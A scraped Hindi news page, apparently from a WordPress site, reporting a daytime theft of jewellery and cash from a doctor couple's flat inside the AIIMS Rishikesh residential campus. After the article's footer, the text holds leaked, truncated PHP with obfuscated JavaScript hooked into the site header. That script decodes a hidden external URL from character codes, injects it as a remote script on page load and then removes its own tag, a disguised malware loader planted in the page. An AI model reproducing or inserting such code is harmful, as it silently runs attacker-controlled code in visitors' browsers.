Monday, June 24, 2024
Google search engine
Homeउत्तराखंडएम्स ऋषिकेश परिसर में डॉक्टर के फ्लैट से लाखों की चोरी! हाई...

एम्स ऋषिकेश परिसर में डॉक्टर के फ्लैट से लाखों की चोरी! हाई सिक्योरिटी पर उठे सवाल

अखिल भारतीय आयुर्विज्ञान संस्थान ऋषिकेश के आवासीय परिसर में दिन दहाड़े चोरों ने डॉक्टर के घर में लाखों की चोरी कर डाली। वारदात को अंजाम तब दिया गया जब डॉक्टर दंपति ड्यूटी पर गए थे। वहीं इस घटना के बाद एम्स की सुरक्षा व्यवस्था पर सवाल उठने लगे हैं। चोर घर के भीतर से करीब 10 लाख रुपये के जेवर और 40 हजार नकदी चुरा ले गए। पुलिस ने मौके पर जाकर जांच की. यहां लगे सीसीटीवी कैमरे की फुटेज की जांच की जा रही है।

एम्स ऋषिकेश में तैनात असिस्टेंट प्रोफेसर डॉक्टर अशोक सिंह पैथोलाजी विभाग में कार्यरत हैं। उनकी पत्नी डॉक्टर रश्मि हिमालयन हॉस्पिटल जौलीग्रांट में प्रसूति एवं महिला रोग विभाग में तैनात हैं। डॉक्टर दंपति अपनी अपनी ड्यूटी पर चले गए। उनकी छोटी बेटी स्कूल चली गई। एम्स के आवासीय परिसर में चिकित्सक दंपति का सातवीं मंजिल में फ्लैट है। घर में काम करने वाली नौकरानी जब फ्लैट पर पहुंची तो दरवाजे पर ताला नहीं था। उन्होंने डॉक्टर अशोक को इस जानकारी दी। डॉक्टर ने भीतर जाकर देखा तो दोनों कमरों के भीतर सामान बिखरा हुआ था। अलमारी और उसके लाकर तोड़ दिए गए थे। सूचना पाकर एम्स पुलिस चौकी से चौकी प्रभारी मनवर सिंह और एम्स के सुरक्षा कर्मी मौके पर पहुंचे। पुलिस के अनुसार चिकित्सक दंपति से जब पूछताछ की गई तो उन्होंने बताया कि घर के भीतर से करीब 40 हजार रुपये नकद और आठ से 10 लाख के जेवर चोरी हुए हैं। चिकित्सक की ओर से पुलिस को शिकायत दे दी गई है। चौकी प्रभारी ने बताया कि आसपास सीसीटीवी कैमरों की जांच की गई है। कुछ कैमरे खराब हैं। लिफ्ट के भीतर भी कैमरे की फुटेज देखी जा रही है। बता दें कि एम्स के आवासीय परिसर में आम आदमी को जाने की अनुमति नहीं है। मुख्य गेट से भी प्रवेश पत्र अथवा अनुमति मिलने के बाद ही प्रवेश दिया जाता है। सुरक्षा के नाम पर इतनी चाक चौबंद व्यवस्था के बावजूद सातवीं मंजिल में स्थित फ्लैट में चोरी की वारदात ने सुरक्षा व्यवस्था पर सवाल खड़े किए हैं।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>